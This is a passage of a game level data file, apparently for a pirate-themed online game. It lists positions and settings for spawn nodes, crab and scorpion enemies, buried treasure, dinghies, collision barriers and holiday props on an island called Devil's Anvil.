'models/tunnels/pir_m_are_tun_cave'}}, '1172209006.11sdnaik': {'Type': 'Island Game Area', 'File': 'anvil_island_area_barbossa_cave', 'Hpr': VBase3(44.069, 0.0, 0.0), 'Objects': {'1172209006.14sdnaik': {'Type': 'Locator Node', 'Name': 'portal_interior_1', 'GridPos': Point3(-189.152, -270.01, 621.081), 'Hpr': VBase3(95.675, 0.0, 0.0), 'Pos': Point3(85.919, -190.083, 24.757), 'Scale': VBase3(1.0, 1.0, 1.0)}}, 'Pos': Point3(-1041.043, -125.656, 784.758), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/caves/pir_m_are_cav_barbossa'}}, '1179265792.0dxschafe0': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(92.182, 322.044, 14.274), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265792.0dxschafe1': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(484.566, -152.122, 24.766), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265792.0dxschafe2': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(274.556, -338.71, 19.625), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265792.0dxschafe3': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(-39.93, -416.502, 17.591), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'VisSize': '', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(599.676, -99.293, 14.865), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Ambush', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe0': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(525.573, -246.82, 19.678), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe1': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(475.158, 185.339, 17.029), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe2': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(103.481, -443.445, 14.221), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe3': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-70.548, -470.441, 10.584), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Ambush', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe4': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-191.895, -361.723, 10.601), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T3', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe5': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(255.868, -260.416, 26.309), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Ambush', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179266048.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(146.583, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-2.71, -313.549, 25.759), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179266048.0dxschafe0': {'Type': 'Object Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(198.651, -280.033, 26.229), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266048.0dxschafe1': {'Type': 'Object Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-120.407, -308.577, 22.002), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266048.0dxschafe2': {'Type': 'Object Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-51.641, 316.748, 13.308), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266048.0dxschafe3': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-34.752, 372.583, 6.103), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T3', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179266176.0dxschafe': {'Type': 'Object Spawn Node', 'Hpr': VBase3(0.0, 0.0, 8.13), 'Pos': Point3(594.806, -37.041, 13.963), 'Priority': '1', 'Scale': VBase3(0.926, 0.926, 0.926), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266176.0dxschafe0': {'Type': 'Object Spawn Node', 'Hpr': VBase3(0.0, 4.0, 0.0), 'Pos': Point3(-112.953, -473.594, 8.516), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179288192.0JB0': {'Type': 'Player Boot Node', 'AreaUid': '1172208953.16sdnaik', 'Hpr': VBase3(-26.706, 0.0, 0.0), 'Pos': Point3(156.168, 233.226, 24.553), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.5, 1.0, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1184890880.0dxschafe0': {'Type': 'Locator Node', 'Name': 'portal_exterior_2', 'Hpr': VBase3(-88.249, 0.0, 0.0), 'Pos': Point3(111.24, -257.791, 26.94), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1184890880.0dxschafe1': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(-61.301, -3.389, 0.0), 'Location': 'Water', 'Pos': Point3(439.778, 290.738, 0.913), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1184891008.0dxschafe': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(3.889, -6.361, 3.088), 'Location': 'Water', 'Pos': Point3(176.081, 347.603, 4.377), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1184891008.0dxschafe0': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': 1, 'Pos': Point3(153.026, 334.063, 7.954), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1184891008.0dxschafe1': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': 1, 'Pos': Point3(323.216, 284.901, 8.216), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1184891136.0dxschafe': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': 1, 'Pos': Point3(514.201, 137.198, 13.158), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1189100537.84kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(50.735, 0.0, 0.0), 'Location': 'Land', 'Pos': Point3(649.482, -78.732, 0.09), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100602.12kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(68.908, 0.0, 0.0), 'Location': 'Land', 'Pos': Point3(457.149, -385.579, -0.171), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100641.06kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(-35.56, 0.0, 0.0), 'Location': 'Water', 'Pos': Point3(-11.463, -540.969, 0.135), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100678.54kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(-33.496, 0.0, 0.0), 'Location': 'Land', 'Pos': Point3(-245.855, -324.606, 0.684), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100725.93kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(74.707, 0.0, 0.0), 'Pos': Point3(-230.516, -311.041, 3.68), 'Scale': VBase3(0.32, 1.0, 3.524), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1189100753.31kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(-55.758, 0.0, 0.0), 'Pos': Point3(-254.586, -316.186, -8.463), 'Scale': VBase3(1.12, 1.665, 6.122), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1189101604.12kmuller': {'Type': 'Player Spawn Node', 'Hpr': VBase3(-79.286, 0.0, 0.0), 'Index': 1, 'Pos': Point3(496.556, -119.78, 24.341), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1189101641.11kmuller': {'Type': 'Player Spawn Node', 'Hpr': VBase3(-122.92, 0.0, 0.0), 'Index': 1, 'Pos': Point3(370.191, -357.047, 10.264), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1189101693.67kmuller': {'Type': 'Player Spawn Node', 'Hpr': VBase3(167.296, 0.0, 0.0), 'Index': 1, 'Pos': Point3(4.016, -471.999, 10.921), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'VisSize': '', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(528.486, 71.76, 17.725), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe0': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(578.324, -7.22, 14.717), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe1': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(545.118, -160.422, 21.495), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe2': {'Type': 'Spawn Node', 'Aggro Radius': '21.0843', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(581.331, -230.437, 12.441), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe3': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(207.309, -426.927, 9.727), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe4': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(390.712, -234.692, 25.604), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T3', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe5': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(46.687, 368.522, 8.715), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe6': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(6.195, 326.657, 17.947), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe7': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(258.724, 301.051, 6.949), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(543.666, -204.087, 19.874), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe0': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(555.765, -277.98, 10.425), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe1': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(12.388, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(590.354, -178.998, 13.951), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe2': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(163.412, -468.794, 6.478), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890725.88piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(-159.444, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(57.897, -316.736, 26.041), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Patrol', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890800.17piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(149.036, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': '30', 'Pos': Point3(445.205, -81.831, 25.172), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890808.98piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(-25.201, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': '30', 'Pos': Point3(311.639, -230.79, 26.009), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890842.97piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(401.465, -100.152, 25.367), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1245890893.36piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(347.257, -213.186, 25.759), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1245890966.97piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(-95.545, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': '30', 'Pos': Point3(251.138, 185.153, 26.013), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890983.39piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(354.425, 125.546, 26.731), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1245890987.89piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(432.517, 7.348, 25.311), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1257277464.2caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(154.997, 3.126, -6.668), 'Pos': Point3(453.792, 157.389, 24.139), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_snowman_generic_winter09'}}, '1257277510.51caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-87.195, 0.0, 0.0), 'Pos': Point3(454.447, 155.965, 24.427), 'Scale': VBase3(1.662, 1.662, 1.662), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_sandpile02_winter09'}}}, 'Undockable': False, 'Visibility': 'Grid', 'Visual': {'Model': 'models/islands/pir_m_are_isl_devilsAnvil'}}}, 'Node Links': [['1245890808.98piwanow', '1245890842.97piwanow', 'Bi-directional'], ['1245890800.17piwanow', '1245890893.36piwanow', 'Bi-directional'], ['1245890983.39piwanow', '1245890966.97piwanow', 'Bi-directional'], ['1245890987.89piwanow', '1245890983.39piwanow', 'Bi-directional']], 'Layers': {}, 'ObjectIds': {'1164135492.81dzlu': '["Objects"]["1164135492.81dzlu"]', 